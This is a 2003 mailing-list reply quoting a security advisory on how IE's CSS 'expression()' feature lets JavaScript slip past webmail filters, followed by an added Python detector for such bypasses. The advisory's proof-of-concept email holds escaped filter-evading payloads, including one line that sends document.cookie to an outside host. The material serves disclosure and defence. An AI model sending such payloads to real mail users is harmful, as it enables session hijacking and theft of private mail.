RE: Webmails + Internet Explorer can create unwanted javascript execution



Yahoo has a massive userbase (with good reason).

This kind of bug could potentially turn some IE security issues into a more
readily mail borne attack. This could be bad. Very bad.

I do not see that you have contacted Yahoo on this. 



> -----Original Message-----
> From: Jedi/Sector One [mailto:j@xxxxxxxxxxxx] 
> Sent: Thursday, October 02, 2003 2:39 PM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Webmails + Internet Explorer can create unwanted javascript execution
> 
> 
> 
> 
> Summary : Multiple web-based mail systems browsed through Internet Explorer
>           can allow arbitrary javascript execution.
> Date    : 02/10/2003
> Author  : Frank Denis <j@xxxxxxxxxxxx>
> 
> 
>        ------------------------[ Description ]------------------------
>        
>   The issue described here doesn't reveal a vulnerability in 
> a specific product. But the combination of features of 
> Internet Explorer with features of common webmail software 
> can create a vulnerability.
> 
> 1) Internet Explorer interprets stylesheets for any HTML tag, 
> even non-existent ones. For instance :
> 
> <xbody style="...">
> 
>   is not a valid tag, but attributes are evaluated.
>   
>   It may be considered as a bug or as a logical behavior, 
> your mileage may vary. And this alone is not a security flaw.
> 
> 2) Internet Explorer can evaluate Javascript expressions in 
> style sheets through the "expression" keyword :
> 
> <style type="text/css">
> a {
>   width: expression(6 * 9 + 'px');  
> }
> </style>
> 
>   This is not a bug either, but a proprietary, properly 
> documented extension.
> 
> 3) Due to the increase of HTML-only email, most popular 
> webmail software can display HTML email. In this context, 
> Javascript _must_ be removed from every email. To achieve 
> this result, various tricks are used by webmail software :
> 
>  - Removal or mangling of <script> tags,
>  
>  - Removal or mangling of "javascript:" urls.
>  
>  - Removal or mangling of properties like "onmouseover".
>  
> 
>       ------------------------[ Vulnerability ]------------------------
> 
>   By combining 2) with 3) and if the webmail doesn't filter 
> out stylesheets nor the "expression" keyword, any Javascript 
> contained in a message will be executed as soon as the 
> recipient will display it.
> 
>   Some webmail software has been aware of that issue for a while 
> and is mangling or filtering any occurrence of 
> "expression". However, the mangling may not work when the 
> name of the property is escaped (like "e\xpression") as CSS 
> permits. Or it may not work in the context of 
> non-existent-because-mangled tags. The former worked on 
> Yahoo! until yesterday (the issue was fixed quickly after 
> being reported, they are nice and reactive guys).
> 
>   But most software simply doesn't know about "expression". 
> It is _not_ faulty, though. This is neither a bug nor a 
> vulnerability. "expression" is a proprietary extension. 
> Webmails don't have to know about every possible implication 
> of every proprietary extension of every version of every 
> browser out there.
> 
>   However, when the following conditions are met, the 
> Javascript is executed :
>   
> - "expression" keywords aren't filtered/mangled by the 
> webmail software.
> 
> - The client software is Internet Explorer.
> 
> - Javascript isn't disabled in the client software. 
> Unfortunately, a lot of public webmail systems simply don't 
> work when Javascript is disabled.
>  
> 
>        ------------------------[ Impact ]------------------------
> 
>   Depending on the webmail software, complete control of the 
> client's session may be possible. Private mail can be deleted 
> or bounced to evil addresses, cookies and session identifiers 
> can be stolen, etc.
> 
> 
>     ------------------------[ Proof of concept ]------------------------
>                
>   Webmail software likes to filter or mangle stylesheets. Some 
> software totally removes everything inside <head>...</head> 
> tags. Some software totally removes <body>...</body> tags 
> (possibly killing style info by the way) instead of 
> converting them to something like <div>...</div>. Some 
> software totally removes <style>...</style> definitions but 
> accepts inline css. 
>   This is bad, because it encourages people to send broken 
> HTML 3 code instead of well-formed, accessible XHTML documents.
>   The following HTML email tries to add workarounds for this 
> kind of filter in order to test whether the "expression" 
> keyword properly gets evaluated on Internet Explorer. It 
> currently works at least with IE 6 + Squirrelmail, Yahoo! and 
> the software of a dozen public and ISP webmail services I 
> have an account on.
> 
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
>                "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
> <head>
>   <title>Webmail test</title>
>   <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
> </head>
> <body style="width:&#x65;xpres\sion(alert(1))">
>   <style type="text/css">
> h1 {
>   he\ight:&#x65;\xpression(alert(2));
>   bac\kground-image:&#x65;\xpression('url(http://example.org/'+document.cookie+$
> }
>   </style>
>   <h1 style="width:&#x65;xpression(alert(3))">...</h1>
>   <div id="just-for-fun">
>     <a href="&#x6A;avascript:window.open(document.location);"
>        onmouseover="alert(4)">fireworks</a>
>   </div>
> </body>
> </html>
> 
> 
>          ------------------------[ Fix ]------------------------
> 
>   For the end user, there are four ways to avoid this issue :
>   
>  - Don't use Internet Explorer to connect to webmails.
> or/and
>  - Disable Javascript.
> or/and
>  - Configure the webmail to only display mails as plain text.
> or/and
>  - Only connect to webmails when you are 100% sure the 
> software it is powered by completely filters or mangles 
> "expression" keywords and hope that software and the version 
> won't change silently.
> 
> 
> --
>  __  /*-      Frank DENIS (Jedi/Sector One) <j@xxxxxxxxxxxxxxx>     -*\  __
>  \ '/    <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
>   \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/
>
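A defensive check for the filter bypass the advisory describes, added here as an example; it is not code from the original post or from any webmail product. It normalizes CSS in the order a browser would (HTML character references, then CSS backslash escapes, then comments and case) before looking for expression(, so "e\xpression", "&#x65;xpression" and "\65 xpression" are all caught, on invented tags such as <xbody> as well as real ones. SAMPLE_MESSAGE is constructed from the advisory's fragments, and the regex-based HTML scanning is a simplification standing in for a real HTML parser.

```python
import html
import re

# CSS escapes: "\" + 1-6 hex digits (+ one optional whitespace), or "\" + any
# other character standing for itself, so "e\xpression" is "expression".
_CSS_ESCAPE = re.compile(r'\\(?:([0-9a-fA-F]{1,6})[ \t\n\f\r]?|(.))', re.S)
_CSS_COMMENT = re.compile(r'/\*.*?\*/', re.S)
_EXPRESSION = re.compile(r'expression\s*\(')
# style="..." on ANY tag (IE honours it on invented tags like <xbody>) and the
# text of <style> blocks; regexes are enough for this demonstration.
_STYLE_ATTR = re.compile(r'\bstyle\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))', re.I)
_STYLE_BLOCK = re.compile(r'<style\b[^>]*>(.*?)</style\s*>', re.I | re.S)

def _unescape_css(value):
    def repl(m):
        if m.group(1):
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else ''
        return m.group(2)
    return _CSS_ESCAPE.sub(repl, value)

def normalize_css(value):
    """Reduce CSS to what the browser's CSS parser sees: HTML character
    references (&#x65;) first, then CSS escapes, then strip comments and fold
    case. Entities are decoded in <style> text too, which is conservative."""
    text = _unescape_css(html.unescape(value))
    return _CSS_COMMENT.sub('', text).lower()

def contains_expression(css):
    """True when the normalized CSS carries an IE expression(...) call."""
    return bool(_EXPRESSION.search(normalize_css(css)))

def find_css_expressions(message_html):
    """Raw CSS fragments (inline styles, <style> blocks) of an HTML message
    that would reach IE as expression(...), whatever tag carries them."""
    hits = []
    for m in _STYLE_ATTR.finditer(message_html):
        raw = next(g for g in m.groups() if g is not None)
        if contains_expression(raw):
            hits.append(raw)
    for m in _STYLE_BLOCK.finditer(message_html):
        if contains_expression(m.group(1)):
            hits.append(m.group(1).strip())
    return hits

# Constructed test message built from the escaping tricks in the advisory.
SAMPLE_MESSAGE = r"""<xbody style="width:&#x65;xpres\sion(alert(1))">
<style type="text/css">h1 { he\ight:&#x65;\xpression(alert(2)); }</style>
<h1 style="width:&#x65;xpression(alert(3))">...</h1>
<p style="width: 100px; color: red">benign</p></xbody>"""
```

A webmail filter would drop or neutralize every fragment `find_css_expressions` returns rather than substring-matching the literal word "expression" in the raw message.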